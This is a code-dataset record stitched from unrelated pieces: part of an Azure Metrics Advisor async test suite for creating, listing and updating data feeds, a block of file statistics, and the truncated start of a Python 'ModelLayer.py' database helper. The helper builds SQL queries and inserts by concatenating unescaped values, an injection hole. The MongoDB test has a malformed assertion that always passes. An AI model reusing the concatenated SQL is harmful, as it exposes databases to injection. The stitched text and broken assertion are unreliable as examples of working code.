DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 10, 1),
),
)
if self.is_live:
variables["data_feed_id"] = data_feed.id
assert data_feed.id is not None
assert data_feed.created_time is not None
assert data_feed.name is not None
assert data_feed.source.data_source_type == "AzureTable"
assert data_feed.source.table == "adsample"
assert data_feed.source.query == "PartitionKey ge '@StartTime' and PartitionKey lt '@EndTime'"
finally:
await self.clean_up(client.delete_data_feed, variables)
return variables
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_create_data_feed_with_azure_blob(self, client, variables):
name = self.create_random_name("blobfeed")
if self.is_live:
variables["data_feed_name"] = name
async with client:
try:
data_feed = await client.create_data_feed(
name=variables["data_feed_name"],
source=AzureBlobDataFeedSource(
connection_string="azure_blob_connection_string",
container="adsample",
blob_template="%Y/%m/%d/%h/JsonFormatV2.json"
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 10, 1),
),
)
if self.is_live:
variables["data_feed_id"] = data_feed.id
assert data_feed.id is not None
assert data_feed.created_time is not None
assert data_feed.name is not None
assert data_feed.source.data_source_type == "AzureBlob"
assert data_feed.source.container == "adsample"
assert data_feed.source.blob_template == "%Y/%m/%d/%h/JsonFormatV2.json"
finally:
await self.clean_up(client.delete_data_feed, variables)
return variables
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_create_data_feed_with_azure_cosmos_db(self, client, variables):
name = self.create_random_name("cosmosfeed")
if self.is_live:
variables["data_feed_name"] = name
async with client:
try:
data_feed = await client.create_data_feed(
name=variables["data_feed_name"],
source=AzureCosmosDbDataFeedSource(
connection_string="azure_cosmosdb_connection_string",
sql_query="'SELECT * FROM Items I where I.Timestamp >= @StartTime and I.Timestamp < @EndTime'",
database="adsample",
collection_id="adsample"
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 10, 1),
),
)
if self.is_live:
variables["data_feed_id"] = data_feed.id
assert data_feed.id is not None
assert data_feed.created_time is not None
assert data_feed.name is not None
assert data_feed.source.data_source_type == "AzureCosmosDB"
assert data_feed.source.database == "adsample"
assert data_feed.source.collection_id == "adsample"
assert data_feed.source.sql_query == "'SELECT * FROM Items I where I.Timestamp >= @StartTime and I.Timestamp < @EndTime'"
finally:
await self.clean_up(client.delete_data_feed, variables)
return variables
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_create_data_feed_with_application_insights(self, client, variables):
name = self.create_random_name("applicationinsights")
if self.is_live:
variables["data_feed_name"] = name
async with client:
try:
query = "let gran=60m; let starttime=datetime(@StartTime); let endtime=starttime + gran; requests | " \
"where timestamp >= starttime and timestamp < endtime | summarize request_count = count(), " \
"duration_avg_ms = avg(duration), duration_95th_ms = percentile(duration, 95), " \
"duration_max_ms = max(duration) by resultCode"
data_feed = await client.create_data_feed(
name=variables["data_feed_name"],
source=AzureApplicationInsightsDataFeedSource(
azure_cloud="Azure",
application_id="3706fe8b-98f1-47c7-bf69-b73b6e53274d",
api_key="application_insights_api_key",
query=query
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2021, 7, 1),
),
)
if self.is_live:
variables["data_feed_id"] = data_feed.id
assert data_feed.id is not None
assert data_feed.created_time is not None
assert data_feed.name is not None
assert data_feed.source.data_source_type == "AzureApplicationInsights"
assert data_feed.source.application_id == "3706fe8b-98f1-47c7-bf69-b73b6e53274d"
assert data_feed.source.query is not None
finally:
await self.clean_up(client.delete_data_feed, variables)
return variables
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_create_data_feed_with_data_explorer(self, client, variables):
name = self.create_random_name("azuredataexplorer")
if self.is_live:
variables["data_feed_name"] = name
async with client:
try:
query = "let StartDateTime = datetime(@StartTime); let EndDateTime = StartDateTime + 1d; " \
"adsample | where Timestamp >= StartDateTime and Timestamp < EndDateTime"
data_feed = await client.create_data_feed(
name=variables["data_feed_name"],
source=AzureDataExplorerDataFeedSource(
connection_string="azure_data_explorer_connection_string",
query=query
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 1, 1),
),
)
if self.is_live:
variables["data_feed_id"] = data_feed.id
assert data_feed.id is not None
assert data_feed.created_time is not None
assert data_feed.name is not None
assert data_feed.source.data_source_type == "AzureDataExplorer"
assert data_feed.source.query == query
finally:
await self.clean_up(client.delete_data_feed, variables)
return variables
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_create_data_feed_with_influxdb(self, client, variables):
name = self.create_random_name("influxdb")
if self.is_live:
variables["data_feed_name"] = name
async with client:
try:
data_feed = await client.create_data_feed(
name=variables["data_feed_name"],
source=InfluxDbDataFeedSource(
connection_string="influxdb_connection_string",
database="adsample",
user_name="adreadonly",
password="influxdb_password",
query="'select * from adsample2 where Timestamp = @StartTime'"
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 1, 1),
),
)
if self.is_live:
variables["data_feed_id"] = data_feed.id
assert data_feed.id is not None
assert data_feed.created_time is not None
assert data_feed.name is not None
assert data_feed.source.data_source_type == "InfluxDB"
assert data_feed.source.query is not None
assert data_feed.source.database == "adsample"
assert data_feed.source.user_name == "adreadonly"
finally:
await self.clean_up(client.delete_data_feed, variables)
return variables
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_create_data_feed_with_datalake(self, client, variables):
name = self.create_random_name("datalake")
if self.is_live:
variables["data_feed_name"] = name
async with client:
try:
data_feed = await client.create_data_feed(
name=variables["data_feed_name"],
source=AzureDataLakeStorageGen2DataFeedSource(
account_name="adsampledatalakegen2",
account_key="azure_datalake_account_key",
file_system_name="adsample",
directory_template="%Y/%m/%d",
file_template="adsample.json"
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost", display_name="Cost"),
DataFeedMetric(name="revenue", display_name="Revenue")
],
dimensions=[
DataFeedDimension(name="category", display_name="Category"),
DataFeedDimension(name="city", display_name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 1, 1),
),
)
if self.is_live:
variables["data_feed_id"] = data_feed.id
assert data_feed.id is not None
assert data_feed.created_time is not None
assert data_feed.name is not None
assert data_feed.source.data_source_type == "AzureDataLakeStorageGen2"
assert data_feed.source.account_name == "adsampledatalakegen2"
assert data_feed.source.file_system_name == "adsample"
assert data_feed.source.directory_template == "%Y/%m/%d"
assert data_feed.source.file_template == "adsample.json"
finally:
await self.clean_up(client.delete_data_feed, variables)
return variables
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_create_data_feed_with_mongodb(self, client, variables):
name = self.create_random_name("mongodb")
if self.is_live:
variables["data_feed_name"] = name
async with client:
try:
data_feed = await client.create_data_feed(
name=variables["data_feed_name"],
source=MongoDbDataFeedSource(
connection_string="mongodb_connection_string",
database="adsample",
command='{"find": "adsample", "filter": { Timestamp: { $eq: @StartTime }} "batchSize": 2000,}'
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 1, 1),
),
)
if self.is_live:
variables["data_feed_id"] = data_feed.id
assert data_feed.id is not None
assert data_feed.created_time is not None
assert data_feed.name is not None
assert data_feed.source.data_source_type == "MongoDB"
assert data_feed.source.database == "adsample"
assert data_feed.source.command, '{"find": "adsample", "filter": { Timestamp: { $eq: @StartTime }} "batchSize": 2000 == }'
finally:
await self.clean_up(client.delete_data_feed, variables)
return variables
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_create_data_feed_with_mysql(self, client, variables):
name = self.create_random_name("mysql")
if self.is_live:
variables["data_feed_name"] = name
async with client:
try:
data_feed = await client.create_data_feed(
name=variables["data_feed_name"],
source=MySqlDataFeedSource(
connection_string="mysql_connection_string",
query="'select * from adsample2 where Timestamp = @StartTime'"
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 1, 1),
),
)
if self.is_live:
variables["data_feed_id"] = data_feed.id
assert data_feed.id is not None
assert data_feed.created_time is not None
assert data_feed.name is not None
assert data_feed.source.data_source_type == "MySql"
assert data_feed.source.query == "'select * from adsample2 where Timestamp = @StartTime'"
finally:
await self.clean_up(client.delete_data_feed, variables)
return variables
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_create_data_feed_with_postgresql(self, client, variables):
name = self.create_random_name("postgresql")
if self.is_live:
variables["data_feed_name"] = name
async with client:
try:
data_feed = await client.create_data_feed(
name=variables["data_feed_name"],
source=PostgreSqlDataFeedSource(
connection_string="postgresql_connection_string",
query="'select * from adsample2 where Timestamp = @StartTime'"
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 1, 1),
),
)
if self.is_live:
variables["data_feed_id"] = data_feed.id
assert data_feed.id is not None
assert data_feed.created_time is not None
assert data_feed.name is not None
assert data_feed.source.data_source_type == "PostgreSql"
assert data_feed.source.query == "'select * from adsample2 where Timestamp = @StartTime'"
finally:
await self.clean_up(client.delete_data_feed, variables)
return variables
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_list_data_feeds(self, client):
async with client:
feeds = client.list_data_feeds()
feeds_list = []
async for item in feeds:
feeds_list.append(item)
assert len(feeds_list) > 0
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_list_data_feeds_with_data_feed_name(self, client):
async with client:
feeds = client.list_data_feeds(data_feed_name="azureSqlDatafeed")
feeds_list = []
async for item in feeds:
feeds_list.append(item)
assert len(feeds_list) == 1
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_list_data_feeds_with_skip(self, client):
all_feeds = client.list_data_feeds()
skipped_feeds = client.list_data_feeds(skip=10)
all_feeds_list = []
async for item in all_feeds:
all_feeds_list.append(item)
skipped_feeds_list = []
async for item in skipped_feeds:
skipped_feeds_list.append(item)
assert len(all_feeds_list) > len(skipped_feeds_list)
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_list_data_feeds_with_status(self, client):
async with client:
feeds = client.list_data_feeds(status="Active")
feeds_list = []
async for item in feeds:
feeds_list.append(item)
assert len(feeds_list) > 0
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_list_data_feeds_with_source_type(self, client):
async with client:
feeds = client.list_data_feeds(data_source_type="SqlServer")
feeds_list = []
async for item in feeds:
feeds_list.append(item)
assert len(feeds_list) > 0
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_list_data_feeds_with_granularity_type(self, client):
async with client:
feeds = client.list_data_feeds(granularity_type="Daily")
feeds_list = []
async for item in feeds:
feeds_list.append(item)
assert len(feeds_list) > 0
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer(data_feed=True)
@recorded_by_proxy_async
async def test_update_data_feed_with_model(self, client, variables):
async with client:
try:
update_name = "update" + str(uuid.uuid4())
if self.is_live:
variables["data_feed_updated_name"] = update_name
data_feed = await client.get_data_feed(variables["data_feed_id"])
data_feed.name = variables["data_feed_updated_name"]
data_feed.data_feed_description = "updated"
data_feed.schema.timestamp_column = "time"
data_feed.ingestion_settings.ingestion_begin_time = datetime.datetime(2021, 12, 10)
data_feed.ingestion_settings.ingestion_start_offset = 1
data_feed.ingestion_settings.data_source_request_concurrency = 1
data_feed.ingestion_settings.ingestion_retry_delay = 120
data_feed.ingestion_settings.stop_retry_after = 1
data_feed.rollup_settings.rollup_type = "AlreadyRollup"
data_feed.rollup_settings.rollup_method = "Sum"
data_feed.rollup_settings.rollup_identification_value = "sumrollup"
data_feed.rollup_settings.auto_rollup_group_by_column_names = []
data_feed.missing_data_point_fill_settings.fill_type = "CustomValue"
data_feed.missing_data_point_fill_settings.custom_fill_value = 2
data_feed.access_mode = "Public"
data_feed.viewers = ["updated"]
data_feed.status = "Paused"
data_feed.action_link_template = "updated"
data_feed.source.connection_string = "updated"
data_feed.source.query = "get data"
await client.update_data_feed(data_feed)
updated = await client.get_data_feed(variables["data_feed_id"])
assert updated.name == variables["data_feed_updated_name"]
assert updated.data_feed_description == "updated"
assert updated.schema.timestamp_column == "time"
assert updated.ingestion_settings.ingestion_begin_time == datetime.datetime(2021, 12, 10, tzinfo=tzutc())
assert updated.ingestion_settings.ingestion_start_offset == 1
assert updated.ingestion_settings.data_source_request_concurrency == 1
assert updated.ingestion_settings.ingestion_retry_delay == 120
assert updated.ingestion_settings.stop_retry_after == 1
assert updated.rollup_settings.rollup_type == "AlreadyRollup"
assert updated.rollup_settings.rollup_method == "Sum"
assert updated.rollup_settings.rollup_identification_value == "sumrollup"
assert updated.missing_data_point_fill_settings.fill_type == "CustomValue"
assert updated.missing_data_point_fill_settings.custom_fill_value == 2
assert updated.access_mode == "Public"
assert updated.viewers == ["updated"]
assert updated.status == "Paused"
assert updated.action_link_template == "updated"
assert updated.source.query == "get data"
finally:
await self.clean_up(client.delete_data_feed, variables)
return variables
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer(data_feed=True)
@recorded_by_proxy_async
async def test_update_data_feed_with_kwargs(self, client, variables):
async with client:
try:
data_feed = await client.get_data_feed(variables["data_feed_id"])
update_name = "update" + str(uuid.uuid4())
if self.is_live:
variables["data_feed_updated_name"] = update_name
await client.update_data_feed(
data_feed.id,
name=variables["data_feed_updated_name"],
data_feed_description="updated",
timestamp_column="time",
ingestion_begin_time=datetime.datetime(2021, 9, 10),
ingestion_start_offset=1,
data_source_request_concurrency=1,
ingestion_retry_delay=120,
stop_retry_after=1,
rollup_type="AlreadyRollup",
rollup_method="Sum",
rollup_identification_value="sumrollup",
auto_rollup_group_by_column_names=[],
fill_type="CustomValue",
custom_fill_value=2,
access_mode="Public",
viewers=["updated"],
status="Paused",
action_link_template="updated",
source=SqlServerDataFeedSource(
connection_string="updated",
query="get data"
)
)
updated = await client.get_data_feed(variables["data_feed_id"])
assert updated.name == variables["data_feed_updated_name"]
assert updated.data_feed_description == "updated"
assert updated.schema.timestamp_column == "time"
assert updated.ingestion_settings.ingestion_begin_time == datetime.datetime(2021, 9, 10, tzinfo=tzutc())
assert updated.ingestion_settings.ingestion_start_offset == 1
assert updated.ingestion_settings.data_source_request_concurrency == 1
assert updated.ingestion_settings.ingestion_retry_delay == 120
assert updated.ingestion_settings.stop_retry_after == 1
assert updated.rollup_settings.rollup_type == "AlreadyRollup"
assert updated.rollup_settings.rollup_method == "Sum"
assert updated.rollup_settings.rollup_identification_value == "sumrollup"
assert updated.missing_data_point_fill_settings.fill_type == "CustomValue"
assert updated.missing_data_point_fill_settings.custom_fill_value == 2
assert updated.access_mode == "Public"
assert updated.viewers == ["updated"]
assert updated.status == "Paused"
assert updated.action_link_template == "updated"
assert updated.source.query == "get data"
finally:
await self.clean_up(client.delete_data_feed, variables)
return variables
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer(data_feed=True)
@recorded_by_proxy_async
async def test_update_data_feed_with_model_and_kwargs(self, client, variables):
async with client:
try:
update_name = "update" + str(uuid.uuid4())
if self.is_live:
variables["data_feed_updated_name"] = update_name
data_feed = await client.get_data_feed(variables["data_feed_id"])
data_feed.name = variables["data_feed_updated_name"]
data_feed.data_feed_description = "updateMe"
data_feed.schema.timestamp_column = "don't update me"
data_feed.ingestion_settings.ingestion_begin_time = datetime.datetime(2021, 9, 22)
data_feed.ingestion_settings.ingestion_start_offset = 2
data_feed.ingestion_settings.data_source_request_concurrency = 2
data_feed.ingestion_settings.ingestion_retry_delay = 2
data_feed.ingestion_settings.stop_retry_after = 2
data_feed.rollup_settings.rollup_type = "don't update me"
data_feed.rollup_settings.rollup_method = "don't update me"
data_feed.rollup_settings.rollup_identification_value = "don't update me"
data_feed.rollup_settings.auto_rollup_group_by_column_names = []
data_feed.missing_data_point_fill_settings.fill_type = "don't update me"
data_feed.missing_data_point_fill_settings.custom_fill_value = 4
data_feed.access_mode = "don't update me"
data_feed.viewers = ["don't update me"]
data_feed.status = "don't update me"
data_feed.action_link_template = "don't update me"
data_feed.source.connection_string = "don't update me"
data_feed.source.query = "don't update me"
await client.update_data_feed(
data_feed,
timestamp_column="time",
ingestion_begin_time=datetime.datetime(2021, 9, 10),
ingestion_start_offset=1,
data_source_request_concurrency=1,
ingestion_retry_delay=120,
stop_retry_after=1,
rollup_type="AlreadyRollup",
rollup_method="Sum",
rollup_identification_value="sumrollup",
auto_rollup_group_by_column_names=[],
fill_type="CustomValue",
custom_fill_value=2,
access_mode="Public",
viewers=["updated"],
status="Paused",
action_link_template="updated",
source=SqlServerDataFeedSource(
connection_string="updated",
query="get data"
)
)
updated = await client.get_data_feed(variables["data_feed_id"])
assert updated.name == variables["data_feed_updated_name"]
assert updated.data_feed_description == "updateMe"
assert updated.schema.timestamp_column == "time"
assert updated.ingestion_settings.ingestion_begin_time == datetime.datetime(2021, 9, 10, tzinfo=tzutc())
assert updated.ingestion_settings.ingestion_start_offset == 1
assert updated.ingestion_settings.data_source_request_concurrency == 1
assert updated.ingestion_settings.ingestion_retry_delay == 120
assert updated.ingestion_settings.stop_retry_after == 1
assert updated.rollup_settings.rollup_type == "AlreadyRollup"
assert updated.rollup_settings.rollup_method == "Sum"
assert updated.rollup_settings.rollup_identification_value == "sumrollup"
assert updated.missing_data_point_fill_settings.fill_type == "CustomValue"
assert updated.missing_data_point_fill_settings.custom_fill_value == 2
assert updated.access_mode == "Public"
assert updated.viewers == ["updated"]
assert updated.status == "Paused"
assert updated.action_link_template == "updated"
assert updated.source.query == "get data"
finally:
await self.clean_up(client.delete_data_feed, variables)
return variables
@pytest.mark.skip("skip test")
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer(data_feed=True)
@recorded_by_proxy_async
async def test_update_data_feed_by_reseting_properties(self, client, variables):
async with client:
try:
data_feed = await client.get_data_feed(variables["data_feed_id"])
update_name = "update" + str(uuid.uuid4())
if self.is_live:
variables["data_feed_updated_name"] = update_name
await client.update_data_feed(
data_feed.id,
name=variables["data_feed_updated_name"],
data_feed_description=None,
timestamp_column=None,
ingestion_start_offset=None,
data_source_request_concurrency=None,
ingestion_retry_delay=None,
stop_retry_after=None,
rollup_type=None,
rollup_method=None,
rollup_identification_value=None,
auto_rollup_group_by_column_names=None,
fill_type=None,
custom_fill_value=None,
access_mode=None,
viewers=None,
status=None,
action_link_template=None,
)
updated = await client.get_data_feed(variables["data_feed_id"])
assert updated.name == variables["data_feed_updated_name"]
# assert updated.data_feed_description == "" # doesn't currently clear
# assert updated.schema.timestamp_column == "" # doesn't currently clear
assert updated.ingestion_settings.ingestion_begin_time == datetime.datetime(2019, 10, 1, tzinfo=tzutc())
assert updated.ingestion_settings.ingestion_start_offset == -1
assert updated.ingestion_settings.data_source_request_concurrency == 0
assert updated.ingestion_settings.ingestion_retry_delay == -1
assert updated.ingestion_settings.stop_retry_after == -1
assert updated.rollup_settings.rollup_type == "NoRollup"
assert updated.rollup_settings.rollup_method == "None"
assert updated.rollup_settings.rollup_identification_value is None
assert updated.missing_data_point_fill_settings.fill_type == "SmartFilling"
assert updated.missing_data_point_fill_settings.custom_fill_value == 0
assert updated.access_mode == "Private"
# assert updated.viewers == ["viewers"] # doesn't currently clear
assert updated.status == "Active"
# assert updated.action_link_template == "updated" # doesn't currently clear
finally:
await self.clean_up(client.delete_data_feed, variables)
return variables
| 50.618826
| 138
| 0.573627
| 5,036
| 54,314
| 5.890191
| 0.059571
| 0.09763
| 0.064188
| 0.027307
| 0.87095
| 0.853184
| 0.835856
| 0.805616
| 0.773826
| 0.763847
| 0
| 0.009813
| 0.348952
| 54,314
| 1,072
| 139
| 50.666045
| 0.829049
| 0.010863
| 0
| 0.74558
| 0
| 0.004912
| 0.100374
| 0.016385
| 0
| 0
| 0
| 0
| 0.207269
| 1
| 0
| false
| 0.000982
| 0.010806
| 0
| 0.028487
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
49a490ffde21853d418bf362e235f837327f237f
| 65,831
|
py
|
Python
|
local/Model/ModelLayer.py
|
markusj1201/le_flask_alpha
|
d86f7de41abdae257350c853d16fc57b67231501
|
[
"MIT"
] | 1
|
2020-01-27T20:48:22.000Z
|
2020-01-27T20:48:22.000Z
|
local/Model/ModelLayer.py
|
markusj1201/le_flask_alpha
|
d86f7de41abdae257350c853d16fc57b67231501
|
[
"MIT"
] | null | null | null |
local/Model/ModelLayer.py
|
markusj1201/le_flask_alpha
|
d86f7de41abdae257350c853d16fc57b67231501
|
[
"MIT"
] | 1
|
2020-01-30T14:00:20.000Z
|
2020-01-30T14:00:20.000Z
|
#DB Configuration
def GetConfig():
config = {'server' : 'localhost',
'database' : 'LEForecastDatabase',
'UID' : '',
'password' : ''}
return config
def ValidateAndClauseArguments(kw_dict, table_name, DBobj):
from Model import BPXDatabase as bpx
from Model import QueryFile as qf
col_query = qf.ColumnQuery(table_name)
results = DBobj.Query(col_query)
col_list = results[1]['column_name'].to_list()
clause = []
for key, value in kw_dict.items():
if key in col_list:
in_clause = AddInClause(value)
clause.append(key + ' in ' + in_clause)
if kw_dict:
stmt = 'where '
count = 1
for item in clause:
if count == 1:
stmt = stmt + item
else:
stmt = stmt + ' and ' + item
count = count + 1
else:
stmt = ''
return stmt
def AddInClause(item_list):
count = 1
ret = '('
for item in item_list:
if count != len(item_list):
ret = ret + '\'' + str(item) + '\', '
else:
ret = ret + '\'' + str(item) + '\')'
count = count + 1
return ret
def ReadFromTables(DBObj, table_name, where_clause):
from Model import BPXDatabase as bpx
#Check the where_Clause to make sure it is not empty:
# before, after = str.split(where_clause, 'where ')
# if not after:
# where_clause = ''
#Form basic select statement
stmt = 'select * from ' + table_name + ' ' + where_clause
results = DBObj.Query(stmt)
return results[1]
class ForecastHeader:
def __init__(self, DBObj, WellName=[], CorpID=[], ForecastName=[]):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
self.table = 'Forecast_Header'
self.WellName = WellName
self.CorpID = CorpID
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
self.ForecastName = ForecastName
def ReadTable(self):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
import pandas as pd
Success = True
Messages = []
header_df = pd.DataFrame()
try:
#Create dictionary to pass to where clause
where_dict = {}
if self.WellName:
where_dict['WellName'] = self.WellName
if self.CorpID:
where_dict['CorpID'] = self.CorpID
if self.ForecastName:
where_dict['ForecastName'] = self.ForecastName
#Interpret key words as clauses used to filter query
where_clause = m.ValidateAndClauseArguments(where_dict, self.table, self.DBObj)
header_df = m.ReadFromTables(self.DBObj, self.table, where_clause)
#Convert df to table row objects
rows = []
for idx, item in header_df.iterrows():
Arps_Dict = {}
Arps_Dict['b'] = item['DCA_b']
Arps_Dict['qi'] = item['DCA_qi']
Arps_Dict['Di'] = item['DCA_Di']
row = m.ForecastHeaderRow(item['WellName'], item['CorpID'], item['ForecastName'], item['GFOzYear'], item['Aries_ScenarioID'], Arps_Dict,
item['GFOz'], self.DBObj)
rows.append(row)
except Exception as ex:
rows = []
Success = False
Messages.append('Error reading from the database. ' + str(ex))
return rows, Success, Messages
class ForecastHeaderRow:
def __init__(self, WellName, CorpID, ForecastName, ForecastYear, scenarioName, Arps, GFO, DBObj):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
import pandas as pd
self.WellName = WellName
self.CorpID = CorpID
self.ForecastName = ForecastName
self.ForecastYear = ForecastYear
self.scenarioName = scenarioName
if Arps:
self.Di = str(Arps['Di'])
self.qi = str(Arps['qi'])
self.b = str(Arps['b'])
else:
self.Di = ''
self.qi = ''
self.b = ''
if GFO:
self.GFO = GFO
else:
self.GFO = False
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
def Write(self, Update_User, Update_Date):
from datetime import datetime
Success = True
Messages = []
try:
if isinstance(Update_Date, datetime):
Update_Date = Update_Date.strftime('%Y-%m-%d %H:%M:%S')
hdr_insert_statement = 'insert into [LEForecastDatabase].[dbo].[Forecast_Header] (WellName, CorpID, ForecastName, GFOz, \n'\
'GFOzYear, Aries_ScenarioID, DCA_Di, DCA_qi, DCA_b, Update_Date, Update_User)\n'\
' values (\'' + self.WellName + '\', \'' + self.CorpID + '\', \'' + self.ForecastName + '\', \'' + str(self.GFO) + '\',\n'\
'\'' + str(self.ForecastYear) + '\', \'' + self.scenarioName + '\', \'' + str(self.Di) + '\', \'' + str(self.qi) + '\', \'' + str(self.b) + '\'\n'\
', convert(datetime, \'' + Update_Date + '\', 120), \'' + Update_User + '\')'
Success, Message = self.DBObj.Command(hdr_insert_statement)
if Success:
self.DBObj.Command('commit')
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error writing to the database. ' + str(ex))
return Success, Messages
def Update(self, Update_User, Update_Date):
from Model import ModelLayer as m
Success = True
Messages = []
try:
#Primary keys for Forecast Header table, Query the table for existing entry
#ForecastName, CorpID
ForecastHeaderObj = m.ForecastHeader(self.DBObj, [], [self.CorpID], [self.ForecastName])
rows, Success, Message = ForecastHeaderObj.ReadTable()
if not Success:
Messages.append(Message)
if len(rows) > 1 or not Success:
Success = False
Messages.append('Unsuccessful in attempt to find single entry of header.')
elif len(rows) == 0:
#If no row exists, go ahead and write one
Success, Message = self.Write(Update_User, Update_Date)
Messages.append
else:
Success, Message = self.Delete()
if Success:
Success, Message = self.Write(Update_User, Update_Date)
Messages.append(Message)
if not Success:
rows[0].Write(Update_User, Update_Date)
else:
Messages.append(Message)
except Exception as ex:
Success = False
